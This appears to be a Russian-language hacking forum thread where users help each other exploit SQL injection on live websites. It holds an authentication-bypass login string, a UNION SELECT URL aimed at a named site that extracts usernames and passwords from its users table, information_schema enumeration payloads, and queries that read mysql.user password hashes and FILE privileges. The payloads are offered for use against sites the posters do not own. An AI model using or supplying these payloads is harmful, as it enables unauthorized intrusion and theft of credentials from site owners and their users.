Столько ошибок в одной строчке не в обиду, но больше читай мануалы, это совет user_privileges брать в кавычки не нужно, это ж табличка. UPDATE нужно взять в такие кавычки, чтобы он не определялся как оператор. Там где tracker и localhost нужно отслешировать кавычки, чтобы они не рвали запрос. INSERT INTO USER_PRIVILEGES VALUES('tracker\'@\'localhost',null, `UPDATE`,YES)
Возможен auth bypass,не фильтруються переменные логина и пароля.... Я не смотрел,но может поможет в дальнейшем. ЗЫ:login - ' or 1=1/* admin'/*
что за инъекция:... подставляя кавычку вылетает ошибка После подбирая количество полей нахожу нужное количество. Но принтабельного поля нет... что это такое?
GinTonic, http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+select+1,2,password,4,5,6,7,8,9,10,11,username,13,14+from+users--+
Для GinTonic: 1. Думаю для автора скули лутше так будет): Code: http://www.aaadtc.com/page.php?content=buy&cnum=-21+union+all+select+1,2,password,4,5,6,7,8,9,10,11,username,13,14+from+users-- 2. Если убрать password и поставить 3 или 35656 то ты увидишь как сайт выведет эти числа, можно заменять любое число которое выводица на сайте при скуле, а уже пассворд и юсернаме это часть(столбцы) таблицы юсер для их вывода ты должен их знать! Читай статьи на форуме))): Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд SQL инъекция (в т.ч. и blind SQL) Примеры: Sql Инъекции
такой инъекшн, помогите раскрутить.. так все выводить, базу:таблицу:столбец Code: -133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,table_schema,table_name,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_name=0x75736572+LIMIT+0,1+--+ пытаюсь посмотреть данные, но ничего нет, тоесть вообще пусто, даже пропадают цифры, в принтабельных полях Code: -133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,USERID,USERNAME,USERPASSWORD),6,7,8,9,10+FROM+basename.user+LIMIT+0,1+--+ но ведь должны быть какие-то данные, я пробовал в других таблицах смотреть, но тоже самое, не выводит ничего. Может что не так делаю? Или все таки пустые таблицы? зы Не хотелось бы светить сайт, может кто по асикю подскажет? зыы и еще может кто нить подскажет, что можно почитать по скулям через куки, а то ничего толком найти не могу ((
Ребята такой вопрос как узнать есть ли привелегия FILE в mysql через sql-inj,для версии 4.*.* и 5.*.* ?
site.com/new.php?id=-1+union+select+1,file_priv,3-- так да? щас просто попробывал на пару сайтов ошибка вылазит =/
выводит привилегии на доступ у юзеров. site.com/new.php?id=-1+union+select+1,concat_ws(0x3a,user,password,file_priv),3+from+mysql.user--
Code: site.com/new.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where+user='[B]username[/B]'/* * где username - имя юзера под которым работает база.
